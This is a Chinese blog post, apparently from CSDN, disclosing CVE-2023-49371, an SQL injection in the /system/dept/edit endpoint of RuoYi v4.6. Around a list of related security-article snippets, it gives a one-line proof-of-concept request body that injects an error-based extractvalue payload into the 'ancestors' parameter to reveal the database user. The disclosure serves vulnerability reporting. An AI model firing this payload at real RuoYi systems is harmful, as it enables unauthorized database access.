CVE-2023-49371|RuoYi 若依后台管理系统存在SQL注入漏洞

最新推荐文章于 2024-04-01 14:45:00 发布
最新推荐文章于 2024-04-01 14:45:00 发布
阅读量430 收藏
点赞数
文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/135017178
版权

0x00 前言

RuoYi是一个后台管理系统,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf)主要目的让开发者注重专注业务,降低技术难度,从而节省人力成本,缩短项目周期,提高软件安全质量。

0x01 漏洞描述

/system/dept/edit存在SQL漏洞

0x02 CVE编号

CVE-2023-49371

0x03 影响版本

RuoYi v4.6版本

0x04 漏洞详情

POC:

DeptName=1&deptid=100&ParentId=12&Status=0&ordernum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#

yggcwhat
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RuoYi若依管理系统 v4.5.1
11-24
为您提供RuoYi若依管理系统下载,RuoYi若依管理系统是一个基于SpringBoot的权限管理系统,代码易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用。RuoYi若依管理系统功能:1、用户管理:用户是系统操作者,该功能主要完成系统用户配置。2、部门管理:配置系统组织机构(公司、部门、小组),树结构展现支持权限。3、岗位管理:配置系统用户所属担任职务。4、菜单管理
CVE』简析CVE-2023-48795:SSH协议前缀截断攻击(Terrapin攻击)
Ho1aAs‘s Blog
12-25 5796
简析CVE-2023-48795:SSH协议前缀截断攻击(Terrapin攻击)
漏洞挖掘 | ruoyi框架管理系统漏洞
最新发布
2301_80127209的博客
04-01 1050
在挖src的时候,可以通过信息收集收集弱口令,然后通过后台弱口令进入后台:发现一个弱口令进去后:【魔方老师提醒才发现,这个蓝色的草丛其实可以大致判断是若依系统】看这界面,是不是很像ruoyi插件一看:前端vue.js加上登录的cookie rememberMe:【登录失败时bp抓包相应包有remeberMe=delete】得知登录为shiro框架八九不离十后台就是ruoyi框架的管理系统了。
Easy Chat Server栈缓冲区溢出漏洞CVE-2023-4494分析与复现
C20220511的博客
12-08 272
漏洞源于使用HTTP GET对register.ghp文件进行访问时,未检查用户提交的username值的长度是否超过限制,从而使栈缓冲区溢出,覆盖其他内存空间,可导致任意代码执行。该函数的功能是释放堆内存空间,从代码中可以看出,试图读取一个不存在的地址41414145的数据,导致了异常。从上述的分析中可以看出,调用sprintf函数拼接username字段前,没有检查username的长度是否超出限制,并且username字段可控,导致栈溢出,可以覆盖SEH和函数返回地址,导致任意代码执行。
VmWare vCenter Server漏洞修复方案
Only No.1
07-12 734
vCenter Server 释放后重用漏洞CVE-2023-20893)vCenter Server 越界写入漏洞CVE-2023-20894)vCenter Server 越界读取漏洞CVE-2023-20895)vCenter Server 越界读取漏洞CVE-2023-20896)vCenter Server 堆溢出漏洞CVE-2023-20892)Apache Tomcat版本:>=11.0.0-M6。Apache Tomcat 版本:11.0.0-M5。以上五个漏洞受影响版本。
CVE-2023-40477 WinRAR 远程代码执行漏洞 0Day PoC
【Rainbow Network Technology co., LTD】
09-02 1267
“Game of Rars” – 通过概念验证探索 WinRAR 中新的远程代码执行漏洞
CVE-2023-49371 RuoYi 若依后台管理系统存在SQL注入漏洞
qq_27536045的博客
12-14 1539
CVE-2023-49371RuoYi 若依后台管理系统存在SQL注入漏洞漏洞复现)
若依系统前后台漏洞大全
热门推荐
FY10033的博客
08-07 4万+
漏洞影响范围RuoYi
RuoYi 逻辑缺陷漏洞分析
afeng12345678的博客
07-31 2062
若依逻辑缺陷漏洞分享。漏洞为本人原创,转载请注明出处。
若依管理系统后台sql注入漏洞分析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-23 1944
本文以RuoYi为例学习并整理了基于Mybatis框架的sql注入原理和场景,为高效快速挖掘基于Mybatis框架的sql注入提供一种思路和参考。若依管理系统是基于SpringBoot框架开发的,并利用MyBatis框架进行数据库操作。在RuoYi
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 5766
网络安全-CVE - CIS 漏洞分析以及解决
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告
smellycat000的专栏
12-22 1631
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Splunk Enterprise是机器数据的引擎。使用Splunk可收集、索引和利用所有应用程序、服务器和设备生成的快速移动型计算机数据。关联并分析跨越多个系统的复杂事件。获取新层次的运营可见性以及IT和业务智能。近日,奇安信CERT监测到Splunk Enterprise中存在远程代码执行漏洞(CVE-2022-4...
若依漏洞利用方式总结
RisunJan的博客
01-14 1494
声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
漏洞复现-Ruoyi若依系列
aming小老弟
05-02 2万+
官方漏洞历史文档。
cve-2023-44313漏洞
02-03
CVE-2023-44313是一个安全漏洞,其涉及到某个特定软件或系统的代码中存在的问题。该漏洞可能导致攻击者利用该软件或系统的弱点,来执行恶意代码或获取未授权的访问权限。 对于CVE-2023-44313漏洞,它可能具有多种不同的影响。例如,攻击者可能能够通过利用该漏洞,绕过身份验证机制并访问系统中的敏感数据。此外,他们还可以执行未经授权的命令,使系统陷入不稳定状态,甚至导致系统崩溃。 为了解决CVE-2023-44313漏洞,软件或系统的开发者通常会发布一个安全更新或补丁程序。这个补丁会修复软件或系统中存在漏洞,加强安全性并防止攻击者利用该漏洞。因此,作为用户,我们应该及时安装这些更新或补丁,以确保自己的系统免受该漏洞的影响。 此外,我们还可以采取其他一些措施来防止CVE-2023-44313漏洞的利用。例如,我们应该确保使用的软件和系统是最新版本,因为较旧的版本可能会存在已知的漏洞。此外,保持杀毒软件和防火墙的最新更新也是很重要的,因为它们可以帮助我们检测和阻止潜在的恶意活动。 总之,CVE-2023-44313漏洞是一个需要引起关注并及时处理的安全漏洞。通过安装最新的安全更新和补丁,以及保持软件和系统的最新版本,我们可以显著降低受到该漏洞攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值